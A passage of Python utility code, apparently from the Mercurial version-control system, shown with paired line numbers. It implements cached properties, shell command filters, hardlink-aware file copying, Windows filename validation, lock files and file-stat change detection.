1458 1499
1459 1500 class propertycache(object):
1460 1501 def __init__(self, func):
1461 1502 self.func = func
1462 1503 self.name = func.__name__
1463 1504 def __get__(self, obj, type=None):
1464 1505 result = self.func(obj)
1465 1506 self.cachevalue(obj, result)
1466 1507 return result
1467 1508
1468 1509 def cachevalue(self, obj, value):
1469 1510 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1470 1511 obj.__dict__[self.name] = value
1471 1512
1472 1513 def clearcachedproperty(obj, prop):
1473 1514 '''clear a cached property value, if one has been set'''
1474 1515 if prop in obj.__dict__:
1475 1516 del obj.__dict__[prop]
1476 1517
1477 1518 def pipefilter(s, cmd):
1478 1519 '''filter string S through command CMD, returning its output'''
1479 1520 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1480 1521 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1481 1522 pout, perr = p.communicate(s)
1482 1523 return pout
1483 1524
1484 1525 def tempfilter(s, cmd):
1485 1526 '''filter string S through a pair of temporary files with CMD.
1486 1527 CMD is used as a template to create the real command to be run,
1487 1528 with the strings INFILE and OUTFILE replaced by the real names of
1488 1529 the temporary files generated.'''
1489 1530 inname, outname = None, None
1490 1531 try:
1491 1532 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1492 1533 fp = os.fdopen(infd, r'wb')
1493 1534 fp.write(s)
1494 1535 fp.close()
1495 1536 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1496 1537 os.close(outfd)
1497 1538 cmd = cmd.replace('INFILE', inname)
1498 1539 cmd = cmd.replace('OUTFILE', outname)
1499 1540 code = os.system(cmd)
1500 1541 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1501 1542 code = 0
1502 1543 if code:
1503 1544 raise Abort(_("command '%s' failed: %s") %
1504 1545 (cmd, explainexit(code)))
1505 1546 return readfile(outname)
1506 1547 finally:
1507 1548 try:
1508 1549 if inname:
1509 1550 os.unlink(inname)
1510 1551 except OSError:
1511 1552 pass
1512 1553 try:
1513 1554 if outname:
1514 1555 os.unlink(outname)
1515 1556 except OSError:
1516 1557 pass
1517 1558
1518 1559 filtertable = {
1519 1560 'tempfile:': tempfilter,
1520 1561 'pipe:': pipefilter,
1521 1562 }
1522 1563
1523 1564 def filter(s, cmd):
1524 1565 "filter a string through a command that transforms its input to its output"
1525 1566 for name, fn in filtertable.iteritems():
1526 1567 if cmd.startswith(name):
1527 1568 return fn(s, cmd[len(name):].lstrip())
1528 1569 return pipefilter(s, cmd)
1529 1570
1530 1571 def binary(s):
1531 1572 """return true if a string is binary data"""
1532 1573 return bool(s and '\0' in s)
1533 1574
1534 1575 def increasingchunks(source, min=1024, max=65536):
1535 1576 '''return no less than min bytes per chunk while data remains,
1536 1577 doubling min after each chunk until it reaches max'''
1537 1578 def log2(x):
1538 1579 if not x:
1539 1580 return 0
1540 1581 i = 0
1541 1582 while x:
1542 1583 x >>= 1
1543 1584 i += 1
1544 1585 return i - 1
1545 1586
1546 1587 buf = []
1547 1588 blen = 0
1548 1589 for chunk in source:
1549 1590 buf.append(chunk)
1550 1591 blen += len(chunk)
1551 1592 if blen >= min:
1552 1593 if min < max:
1553 1594 min = min << 1
1554 1595 nmin = 1 << log2(blen)
1555 1596 if nmin > min:
1556 1597 min = nmin
1557 1598 if min > max:
1558 1599 min = max
1559 1600 yield ''.join(buf)
1560 1601 blen = 0
1561 1602 buf = []
1562 1603 if buf:
1563 1604 yield ''.join(buf)
1564 1605
1565 1606 Abort = error.Abort
1566 1607
1567 1608 def always(fn):
1568 1609 return True
1569 1610
1570 1611 def never(fn):
1571 1612 return False
1572 1613
1573 1614 def nogc(func):
1574 1615 """disable garbage collector
1575 1616
1576 1617 Python's garbage collector triggers a GC each time a certain number of
1577 1618 container objects (the number being defined by gc.get_threshold()) are
1578 1619 allocated even when marked not to be tracked by the collector. Tracking has
1579 1620 no effect on when GCs are triggered, only on what objects the GC looks
1580 1621 into. As a workaround, disable GC while building complex (huge)
1581 1622 containers.
1582 1623
1583 1624 This garbage collector issue has been fixed in 2.7, but it still affects
1584 1625 CPython's performance.
1585 1626 """
1586 1627 def wrapper(*args, **kwargs):
1587 1628 gcenabled = gc.isenabled()
1588 1629 gc.disable()
1589 1630 try:
1590 1631 return func(*args, **kwargs)
1591 1632 finally:
1592 1633 if gcenabled:
1593 1634 gc.enable()
1594 1635 return wrapper
1595 1636
1596 1637 if pycompat.ispypy:
1597 1638 # PyPy runs slower with gc disabled
1598 1639 nogc = lambda x: x
1599 1640
1600 1641 def pathto(root, n1, n2):
1601 1642 '''return the relative path from one place to another.
1602 1643 root should use os.sep to separate directories
1603 1644 n1 should use os.sep to separate directories
1604 1645 n2 should use "/" to separate directories
1605 1646 returns an os.sep-separated path.
1606 1647
1607 1648 If n1 is a relative path, it's assumed it's
1608 1649 relative to root.
1609 1650 n2 should always be relative to root.
1610 1651 '''
1611 1652 if not n1:
1612 1653 return localpath(n2)
1613 1654 if os.path.isabs(n1):
1614 1655 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1615 1656 return os.path.join(root, localpath(n2))
1616 1657 n2 = '/'.join((pconvert(root), n2))
1617 1658 a, b = splitpath(n1), n2.split('/')
1618 1659 a.reverse()
1619 1660 b.reverse()
1620 1661 while a and b and a[-1] == b[-1]:
1621 1662 a.pop()
1622 1663 b.pop()
1623 1664 b.reverse()
1624 1665 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1625 1666
1626 1667 def mainfrozen():
1627 1668 """return True if we are a frozen executable.
1628 1669
1629 1670 The code supports py2exe (most common, Windows only) and tools/freeze
1630 1671 (portable, not much used).
1631 1672 """
1632 1673 return (safehasattr(sys, "frozen") or # new py2exe
1633 1674 safehasattr(sys, "importers") or # old py2exe
1634 1675 imp.is_frozen(u"__main__")) # tools/freeze
1635 1676
1636 1677 # the location of data files matching the source code
1637 1678 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1638 1679 # executable version (py2exe) doesn't support __file__
1639 1680 datapath = os.path.dirname(pycompat.sysexecutable)
1640 1681 else:
1641 1682 datapath = os.path.dirname(pycompat.fsencode(__file__))
1642 1683
1643 1684 i18n.setdatapath(datapath)
1644 1685
1645 1686 _hgexecutable = None
1646 1687
1647 1688 def hgexecutable():
1648 1689 """return location of the 'hg' executable.
1649 1690
1650 1691 Defaults to $HG or 'hg' in the search path.
1651 1692 """
1652 1693 if _hgexecutable is None:
1653 1694 hg = encoding.environ.get('HG')
1654 1695 mainmod = sys.modules[r'__main__']
1655 1696 if hg:
1656 1697 _sethgexecutable(hg)
1657 1698 elif mainfrozen():
1658 1699 if getattr(sys, 'frozen', None) == 'macosx_app':
1659 1700 # Env variable set by py2app
1660 1701 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1661 1702 else:
1662 1703 _sethgexecutable(pycompat.sysexecutable)
1663 1704 elif (os.path.basename(
1664 1705 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1665 1706 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1666 1707 else:
1667 1708 exe = findexe('hg') or os.path.basename(sys.argv[0])
1668 1709 _sethgexecutable(exe)
1669 1710 return _hgexecutable
1670 1711
1671 1712 def _sethgexecutable(path):
1672 1713 """set location of the 'hg' executable"""
1673 1714 global _hgexecutable
1674 1715 _hgexecutable = path
1675 1716
1676 1717 def _testfileno(f, stdf):
1677 1718 fileno = getattr(f, 'fileno', None)
1678 1719 try:
1679 1720 return fileno and fileno() == stdf.fileno()
1680 1721 except io.UnsupportedOperation:
1681 1722 return False # fileno() raised UnsupportedOperation
1682 1723
1683 1724 def isstdin(f):
1684 1725 return _testfileno(f, sys.__stdin__)
1685 1726
1686 1727 def isstdout(f):
1687 1728 return _testfileno(f, sys.__stdout__)
1688 1729
1689 1730 def shellenviron(environ=None):
1690 1731 """return environ with optional override, useful for shelling out"""
1691 1732 def py2shell(val):
1692 1733 'convert python object into string that is useful to shell'
1693 1734 if val is None or val is False:
1694 1735 return '0'
1695 1736 if val is True:
1696 1737 return '1'
1697 1738 return pycompat.bytestr(val)
1698 1739 env = dict(encoding.environ)
1699 1740 if environ:
1700 1741 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1701 1742 env['HG'] = hgexecutable()
1702 1743 return env
1703 1744
1704 1745 def system(cmd, environ=None, cwd=None, out=None):
1705 1746 '''enhanced shell command execution.
1706 1747 run with environment maybe modified, maybe in different dir.
1707 1748
1708 1749 if out is specified, it is assumed to be a file-like object that has a
1709 1750 write() method. stdout and stderr will be redirected to out.'''
1710 1751 try:
1711 1752 stdout.flush()
1712 1753 except Exception:
1713 1754 pass
1714 1755 cmd = quotecommand(cmd)
1715 1756 env = shellenviron(environ)
1716 1757 if out is None or isstdout(out):
1717 1758 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1718 1759 env=env, cwd=cwd)
1719 1760 else:
1720 1761 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1721 1762 env=env, cwd=cwd, stdout=subprocess.PIPE,
1722 1763 stderr=subprocess.STDOUT)
1723 1764 for line in iter(proc.stdout.readline, ''):
1724 1765 out.write(line)
1725 1766 proc.wait()
1726 1767 rc = proc.returncode
1727 1768 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1728 1769 rc = 0
1729 1770 return rc
1730 1771
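# A sketch of capturing child output via the 'out' parameter (command and
# sink are hypothetical): because the sink is not the real stdout,
# system() pipes the child and forwards each output line to out.write().
def _systemdemo():
    import io
    buf = io.BytesIO()
    rc = system('echo hello', out=buf)
    return rc, buf.getvalue()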
1731 1772 def checksignature(func):
1732 1773 '''wrap a function with code to check for calling errors'''
1733 1774 def check(*args, **kwargs):
1734 1775 try:
1735 1776 return func(*args, **kwargs)
1736 1777 except TypeError:
1737 1778 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1738 1779 raise error.SignatureError
1739 1780 raise
1740 1781
1741 1782 return check
1742 1783
1743 1784 # a whitelist of known filesystems where hardlinks work reliably
1744 1785 _hardlinkfswhitelist = {
1745 1786 'btrfs',
1746 1787 'ext2',
1747 1788 'ext3',
1748 1789 'ext4',
1749 1790 'hfs',
1750 1791 'jfs',
1751 1792 'NTFS',
1752 1793 'reiserfs',
1753 1794 'tmpfs',
1754 1795 'ufs',
1755 1796 'xfs',
1756 1797 'zfs',
1757 1798 }
1758 1799
1759 1800 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1760 1801 '''copy a file, preserving mode and optionally other stat info like
1761 1802 atime/mtime
1762 1803
1763 1804 The checkambig argument is used with filestat, and is useful only
1764 1805 if the destination file is guarded by a lock (e.g. repo.lock or
1765 1806 repo.wlock).
1766 1807
1767 1808 copystat and checkambig should be exclusive.
1768 1809 '''
1769 1810 assert not (copystat and checkambig)
1770 1811 oldstat = None
1771 1812 if os.path.lexists(dest):
1772 1813 if checkambig:
1773 1814 oldstat = checkambig and filestat.frompath(dest)
1774 1815 unlink(dest)
1775 1816 if hardlink:
1776 1817 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1777 1818 # unless we are confident that dest is on a whitelisted filesystem.
1778 1819 try:
1779 1820 fstype = getfstype(os.path.dirname(dest))
1780 1821 except OSError:
1781 1822 fstype = None
1782 1823 if fstype not in _hardlinkfswhitelist:
1783 1824 hardlink = False
1784 1825 if hardlink:
1785 1826 try:
1786 1827 oslink(src, dest)
1787 1828 return
1788 1829 except (IOError, OSError):
1789 1830 pass # fall back to normal copy
1790 1831 if os.path.islink(src):
1791 1832 os.symlink(os.readlink(src), dest)
1792 1833 # copystat is ignored for symlinks, but in general copystat isn't
1793 1834 # needed for them anyway
1794 1835 else:
1795 1836 try:
1796 1837 shutil.copyfile(src, dest)
1797 1838 if copystat:
1798 1839 # copystat also copies mode
1799 1840 shutil.copystat(src, dest)
1800 1841 else:
1801 1842 shutil.copymode(src, dest)
1802 1843 if oldstat and oldstat.stat:
1803 1844 newstat = filestat.frompath(dest)
1804 1845 if newstat.isambig(oldstat):
1805 1846 # stat of copied file is ambiguous to original one
1806 1847 advanced = (
1807 1848 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1808 1849 os.utime(dest, (advanced, advanced))
1809 1850 except shutil.Error as inst:
1810 1851 raise Abort(str(inst))
1811 1852
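# A sketch of the opportunistic-hardlink pattern above (paths are
# hypothetical): request hardlink=True and let copyfile() silently fall
# back to a real copy on non-whitelisted filesystems or link failure.
def _copyfiledemo(src, dest):
    copyfile(src, dest, hardlink=True)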
1812 1853 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1813 1854 """Copy a directory tree using hardlinks if possible."""
1814 1855 num = 0
1815 1856
1816 1857 gettopic = lambda: hardlink and _('linking') or _('copying')
1817 1858
1818 1859 if os.path.isdir(src):
1819 1860 if hardlink is None:
1820 1861 hardlink = (os.stat(src).st_dev ==
1821 1862 os.stat(os.path.dirname(dst)).st_dev)
1822 1863 topic = gettopic()
1823 1864 os.mkdir(dst)
1824 1865 for name, kind in listdir(src):
1825 1866 srcname = os.path.join(src, name)
1826 1867 dstname = os.path.join(dst, name)
1827 1868 def nprog(t, pos):
1828 1869 if pos is not None:
1829 1870 return progress(t, pos + num)
1830 1871 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1831 1872 num += n
1832 1873 else:
1833 1874 if hardlink is None:
1834 1875 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1835 1876 os.stat(os.path.dirname(dst)).st_dev)
1836 1877 topic = gettopic()
1837 1878
1838 1879 if hardlink:
1839 1880 try:
1840 1881 oslink(src, dst)
1841 1882 except (IOError, OSError):
1842 1883 hardlink = False
1843 1884 shutil.copy(src, dst)
1844 1885 else:
1845 1886 shutil.copy(src, dst)
1846 1887 num += 1
1847 1888 progress(topic, num)
1848 1889 progress(topic, None)
1849 1890
1850 1891 return hardlink, num
1851 1892
1852 1893 _winreservednames = {
1853 1894 'con', 'prn', 'aux', 'nul',
1854 1895 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1855 1896 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1856 1897 }
1857 1898 _winreservedchars = ':*?"<>|'
1858 1899 def checkwinfilename(path):
1859 1900 r'''Check that the base-relative path is a valid filename on Windows.
1860 1901 Returns None if the path is ok, or a UI string describing the problem.
1861 1902
1862 1903 >>> checkwinfilename(b"just/a/normal/path")
1863 1904 >>> checkwinfilename(b"foo/bar/con.xml")
1864 1905 "filename contains 'con', which is reserved on Windows"
1865 1906 >>> checkwinfilename(b"foo/con.xml/bar")
1866 1907 "filename contains 'con', which is reserved on Windows"
1867 1908 >>> checkwinfilename(b"foo/bar/xml.con")
1868 1909 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1869 1910 "filename contains 'AUX', which is reserved on Windows"
1870 1911 >>> checkwinfilename(b"foo/bar/bla:.txt")
1871 1912 "filename contains ':', which is reserved on Windows"
1872 1913 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1873 1914 "filename contains '\\x07', which is invalid on Windows"
1874 1915 >>> checkwinfilename(b"foo/bar/bla ")
1875 1916 "filename ends with ' ', which is not allowed on Windows"
1876 1917 >>> checkwinfilename(b"../bar")
1877 1918 >>> checkwinfilename(b"foo\\")
1878 1919 "filename ends with '\\', which is invalid on Windows"
1879 1920 >>> checkwinfilename(b"foo\\/bar")
1880 1921 "directory name ends with '\\', which is invalid on Windows"
1881 1922 '''
1882 1923 if path.endswith('\\'):
1883 1924 return _("filename ends with '\\', which is invalid on Windows")
1884 1925 if '\\/' in path:
1885 1926 return _("directory name ends with '\\', which is invalid on Windows")
1886 1927 for n in path.replace('\\', '/').split('/'):
1887 1928 if not n:
1888 1929 continue
1889 1930 for c in _filenamebytestr(n):
1890 1931 if c in _winreservedchars:
1891 1932 return _("filename contains '%s', which is reserved "
1892 1933 "on Windows") % c
1893 1934 if ord(c) <= 31:
1894 1935 return _("filename contains '%s', which is invalid "
1895 1936 "on Windows") % escapestr(c)
1896 1937 base = n.split('.')[0]
1897 1938 if base and base.lower() in _winreservednames:
1898 1939 return _("filename contains '%s', which is reserved "
1899 1940 "on Windows") % base
1900 1941 t = n[-1:]
1901 1942 if t in '. ' and n not in '..':
1902 1943 return _("filename ends with '%s', which is not allowed "
1903 1944 "on Windows") % t
1904 1945
1905 1946 if pycompat.iswindows:
1906 1947 checkosfilename = checkwinfilename
1907 1948 timer = time.clock
1908 1949 else:
1909 1950 checkosfilename = platform.checkosfilename
1910 1951 timer = time.time
1911 1952
1912 1953 if safehasattr(time, "perf_counter"):
1913 1954 timer = time.perf_counter
1914 1955
1915 1956 def makelock(info, pathname):
1916 1957 """Create a lock file atomically if possible
1917 1958
1918 1959 This may leave a stale lock file if symlink isn't supported and signal
1919 1960 interrupt is enabled.
1920 1961 """
1921 1962 try:
1922 1963 return os.symlink(info, pathname)
1923 1964 except OSError as why:
1924 1965 if why.errno == errno.EEXIST:
1925 1966 raise
1926 1967 except AttributeError: # no symlink in os
1927 1968 pass
1928 1969
1929 1970 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1930 1971 ld = os.open(pathname, flags)
1931 1972 os.write(ld, info)
1932 1973 os.close(ld)
1933 1974
1934 1975 def readlock(pathname):
1935 1976 try:
1936 1977 return os.readlink(pathname)
1937 1978 except OSError as why:
1938 1979 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1939 1980 raise
1940 1981 except AttributeError: # no symlink in os
1941 1982 pass
1942 1983 fp = posixfile(pathname, 'rb')
1943 1984 r = fp.read()
1944 1985 fp.close()
1945 1986 return r
1946 1987
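# A sketch of the lock round trip (path and payload are hypothetical):
# makelock() prefers an atomic symlink and falls back to an exclusively
# created file; readlock() mirrors the same symlink-then-file fallback.
def _lockdemo(path):
    makelock('pid:12345', path)
    try:
        return readlock(path)  # -> 'pid:12345'
    finally:
        unlink(path)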
1947 1988 def fstat(fp):
1948 1989 '''stat file object that may not have fileno method.'''
1949 1990 try:
1950 1991 return os.fstat(fp.fileno())
1951 1992 except AttributeError:
1952 1993 return os.stat(fp.name)
1953 1994
1954 1995 # File system features
1955 1996
1956 1997 def fscasesensitive(path):
1957 1998 """
1958 1999 Return true if the given path is on a case-sensitive filesystem
1959 2000
1960 2001 Requires a path (like /foo/.hg) ending with a foldable final
1961 2002 directory component.
1962 2003 """
1963 2004 s1 = os.lstat(path)
1964 2005 d, b = os.path.split(path)
1965 2006 b2 = b.upper()
1966 2007 if b == b2:
1967 2008 b2 = b.lower()
1968 2009 if b == b2:
1969 2010 return True # no evidence against case sensitivity
1970 2011 p2 = os.path.join(d, b2)
1971 2012 try:
1972 2013 s2 = os.lstat(p2)
1973 2014 if s2 == s1:
1974 2015 return False
1975 2016 return True
1976 2017 except OSError:
1977 2018 return True
1978 2019
1979 2020 try:
1980 2021 import re2
1981 2022 _re2 = None
1982 2023 except ImportError:
1983 2024 _re2 = False
1984 2025
1985 2026 class _re(object):
1986 2027 def _checkre2(self):
1987 2028 global _re2
1988 2029 try:
1989 2030 # check if match works, see issue3964
1990 2031 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1991 2032 except ImportError:
1992 2033 _re2 = False
1993 2034
1994 2035 def compile(self, pat, flags=0):
1995 2036 '''Compile a regular expression, using re2 if possible
1996 2037
1997 2038 For best performance, use only re2-compatible regexp features. The
1998 2039 only flags from the re module that are re2-compatible are
1999 2040 IGNORECASE and MULTILINE.'''
2000 2041 if _re2 is None:
2001 2042 self._checkre2()
2002 2043 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2003 2044 if flags & remod.IGNORECASE:
2004 2045 pat = '(?i)' + pat
2005 2046 if flags & remod.MULTILINE:
2006 2047 pat = '(?m)' + pat
2007 2048 try:
2008 2049 return re2.compile(pat)
2009 2050 except re2.error:
2010 2051 pass
2011 2052 return remod.compile(pat, flags)
2012 2053
2013 2054 @propertycache
2014 2055 def escape(self):
2015 2056 '''Return the version of escape corresponding to self.compile.
2016 2057
2017 2058 This is imperfect because whether re2 or re is used for a particular
2018 2059 function depends on the flags, etc, but it's the best we can do.
2019 2060 '''
2020 2061 global _re2
2021 2062 if _re2 is None:
2022 2063 self._checkre2()
2023 2064 if _re2:
2024 2065 return re2.escape
2025 2066 else:
2026 2067 return remod.escape
2027 2068
2028 2069 re = _re()
2029 2070
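# A sketch of the singleton above: call re.compile()/re.escape() exactly
# like the stdlib versions and transparently get re2 when it is installed
# and the flags are compatible. The pattern here is hypothetical.
def _redemo():
    pat = re.compile(br'release-\d+', remod.IGNORECASE)
    return bool(pat.search(b'Release-42'))  # -> True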
2030 2071 _fspathcache = {}
2031 2072 def fspath(name, root):
2032 2073 '''Get name in the case stored in the filesystem
2033 2074
2034 2075 The name should be relative to root, and be normcase-ed for efficiency.
2035 2076
2036 2077 Note that this function is unnecessary, and should not be
2037 2078 called, for case-sensitive filesystems (simply because it's expensive).
2038 2079
2039 2080 The root should be normcase-ed, too.
2040 2081 '''
2041 2082 def _makefspathcacheentry(dir):
2042 2083 return dict((normcase(n), n) for n in os.listdir(dir))
2043 2084
2044 2085 seps = pycompat.ossep
2045 2086 if pycompat.osaltsep:
2046 2087 seps = seps + pycompat.osaltsep
2047 2088 # Protect backslashes. This gets silly very quickly.
2048 2089 seps = seps.replace('\\', '\\\\')
2049 2090 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2050 2091 dir = os.path.normpath(root)
2051 2092 result = []
2052 2093 for part, sep in pattern.findall(name):
2053 2094 if sep:
2054 2095 result.append(sep)
2055 2096 continue
2056 2097
2057 2098 if dir not in _fspathcache:
2058 2099 _fspathcache[dir] = _makefspathcacheentry(dir)
2059 2100 contents = _fspathcache[dir]
2060 2101
2061 2102 found = contents.get(part)
2062 2103 if not found:
2063 2104 # retry "once per directory" per "dirstate.walk" which
2064 2105 # may take place for each patch of "hg qpush", for example
2065 2106 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2066 2107 found = contents.get(part)
2067 2108
2068 2109 result.append(found or part)
2069 2110 dir = os.path.join(dir, part)
2070 2111
2071 2112 return ''.join(result)
2072 2113
2073 2114 def checknlink(testfile):
2074 2115 '''check whether hardlink count reporting works properly'''
2075 2116
2076 2117 # testfile may be open, so we need a separate file for checking to
2077 2118 # work around issue2543 (or testfile may get lost on Samba shares)
2078 2119 f1, f2, fp = None, None, None
2079 2120 try:
2080 2121 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
2081 2122 suffix='1~', dir=os.path.dirname(testfile))
2082 2123 os.close(fd)
2083 2124 f2 = '%s2~' % f1[:-2]
2084 2125
2085 2126 oslink(f1, f2)
2086 2127 # nlinks() may behave differently for files on Windows shares if
2087 2128 # the file is open.
2088 2129 fp = posixfile(f2)
2089 2130 return nlinks(f2) > 1
2090 2131 except OSError:
2091 2132 return False
2092 2133 finally:
2093 2134 if fp is not None:
2094 2135 fp.close()
2095 2136 for f in (f1, f2):
2096 2137 try:
2097 2138 if f is not None:
2098 2139 os.unlink(f)
2099 2140 except OSError:
2100 2141 pass
2101 2142
2102 2143 def endswithsep(path):
2103 2144 '''Check path ends with os.sep or os.altsep.'''
2104 2145 return (path.endswith(pycompat.ossep)
2105 2146 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2106 2147
2107 2148 def splitpath(path):
2108 2149 '''Split path by os.sep.
2109 2150 Note that this function does not use os.altsep because this is
2110 2151 an alternative to a simple "xxx.split(os.sep)".
2111 2152 It is recommended to use os.path.normpath() before using this
2112 2153 function if needed.'''
2113 2154 return path.split(pycompat.ossep)
2114 2155
2115 2156 def gui():
2116 2157 '''Are we running in a GUI?'''
2117 2158 if pycompat.isdarwin:
2118 2159 if 'SSH_CONNECTION' in encoding.environ:
2119 2160 # handle SSH access to a box where the user is logged in
2120 2161 return False
2121 2162 elif getattr(osutil, 'isgui', None):
2122 2163 # check if a CoreGraphics session is available
2123 2164 return osutil.isgui()
2124 2165 else:
2125 2166 # pure build; use a safe default
2126 2167 return True
2127 2168 else:
2128 2169 return pycompat.iswindows or encoding.environ.get("DISPLAY")
2129 2170
2130 2171 def mktempcopy(name, emptyok=False, createmode=None):
2131 2172 """Create a temporary file with the same contents from name
2132 2173
2133 2174 The permission bits are copied from the original file.
2134 2175
2135 2176 If the temporary file is going to be truncated immediately, you
2136 2177 can use emptyok=True as an optimization.
2137 2178
2138 2179 Returns the name of the temporary file.
2139 2180 """
2140 2181 d, fn = os.path.split(name)
2141 2182 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2142 2183 os.close(fd)
2143 2184 # Temporary files are created with mode 0600, which is usually not
2144 2185 # what we want. If the original file already exists, just copy
2145 2186 # its mode. Otherwise, manually obey umask.
2146 2187 copymode(name, temp, createmode)
2147 2188 if emptyok:
2148 2189 return temp
2149 2190 try:
2150 2191 try:
2151 2192 ifp = posixfile(name, "rb")
2152 2193 except IOError as inst:
2153 2194 if inst.errno == errno.ENOENT:
2154 2195 return temp
2155 2196 if not getattr(inst, 'filename', None):
2156 2197 inst.filename = name
2157 2198 raise
2158 2199 ofp = posixfile(temp, "wb")
2159 2200 for chunk in filechunkiter(ifp):
2160 2201 ofp.write(chunk)
2161 2202 ifp.close()
2162 2203 ofp.close()
2163 2204 except: # re-raises
2164 2205 try:
2165 2206 os.unlink(temp)
2166 2207 except OSError:
2167 2208 pass
2168 2209 raise
2169 2210 return temp
2170 2211
2171 2212 class filestat(object):
2172 2213 """help to exactly detect change of a file
2173 2214
2174 2215 The 'stat' attribute is the result of 'os.stat()' if the specified
2175 2216 'path' exists; otherwise it is None. This avoids a preparatory
2176 2217 'exists()' check on the client side of this class.
2177 2218 """
2178 2219 def __init__(self, stat):
2179 2220 self.stat = stat
2180 2221
2181 2222 @classmethod
2182 2223 def frompath(cls, path):
2183 2224 try:
2184 2225 stat = os.stat(path)
2185 2226 except OSError as err:
2186 2227 if err.errno != errno.ENOENT:
2187 2228 raise
2188 2229 stat = None
2189 2230 return cls(stat)
2190 2231
2191 2232 @classmethod
2192 2233 def fromfp(cls, fp):
2193 2234 stat = os.fstat(fp.fileno())
2194 2235 return cls(stat)
2195 2236
2196 2237 __hash__ = object.__hash__
2197 2238
2198 2239 def __eq__(self, old):
2199 2240 try:
2200 2241 # if ambiguity between stat of new and old file is
2201 2242 # avoided, comparison of size, ctime and mtime is enough
2202 2243 # to exactly detect change of a file regardless of platform
2203 2244 return (self.stat.st_size == old.stat.st_size and
2204 2245 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2205 2246 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2206 2247 except AttributeError:
2207 2248 pass
2208 2249 try:
2209 2250 return self.stat is None and old.stat is None
2210 2251 except AttributeError:
2211 2252 return False
2212 2253
2213 2254 def isambig(self, old):
2214 2255 """Examine whether new (= self) stat is ambiguous against old one
2215 2256
2216 2257 "S[N]" below means stat of a file at N-th change:
2217 2258
2218 2259 - S[n-1].ctime < S[n].ctime: can detect change of a file
2219 2260 - S[n-1].ctime == S[n].ctime
2220 2261 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2221 2262 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2222 2263 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2223 2264 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2224 2265
2225 2266 Case (*2) above means that a file was changed twice or more
2226 2267 within the same second (= S[n-1].ctime), and comparison of
2227 2268 timestamps is ambiguous.
2228 2269
2229 2270 The basic idea to avoid such ambiguity is "advance mtime by 1 sec,
2230 2271 if the timestamp is ambiguous".
2231 2272
2232 2273 But advancing mtime only in case (*2) doesn't work as
2233 2274 expected, because naturally advanced S[n].mtime in case (*1)
2234 2275 might be equal to manually advanced S[n-1 or earlier].mtime.
2235 2276
2236 2277 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2237 2278 treated as ambiguous regardless of mtime, to avoid changes being
2238 2279 overlooked due to conflicts between such mtimes.
2239 2280
2240 2281 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2241 2282 S[n].mtime", even if size of a file isn't changed.
2242 2283 """
2243 2284 try:
2244 2285 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2245 2286 except AttributeError:
2246 2287 return False
2247 2288
2248 2289 def avoidambig(self, path, old):
2249 2290 """Change file stat of specified path to avoid ambiguity
2250 2291
2251 2292 'old' should be previous filestat of 'path'.
2252 2293
2253 2294 Avoiding ambiguity is skipped if the process doesn't have
2254 2295 appropriate privileges for 'path'; this returns False in that
2255 2296 case.
2256 2297
2257 2298 Otherwise, this returns True, as "ambiguity is avoided".
2258 2299 """
2259 2300 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2260 2301 try:
2261 2302 os.utime(path, (advanced, advanced))
2262 2303 except OSError as inst:
2263 2304 if inst.errno == errno.EPERM:
2264 2305 # utime() on the file created by another user causes EPERM,
2265 2306 # if a process doesn't have appropriate privileges
2266 2307 return False
2267 2308 raise
2268 2309 return True
2269 2310
2270 2311 def __ne__(self, other):
2271 2312 return not self == other
2272 2313
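# A sketch tying frompath()/isambig()/avoidambig() together (the path and
# data are hypothetical). This is the pattern used around files guarded
# by a lock: snapshot the old stat, rewrite the file, then nudge mtime
# forward if the rewrite landed within the same ctime second.
def _filestatdemo(path, data):
    old = filestat.frompath(path)
    writefile(path, data)
    new = filestat.frompath(path)
    if new.isambig(old):
        new.avoidambig(path, old)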
2273 2314 class atomictempfile(object):
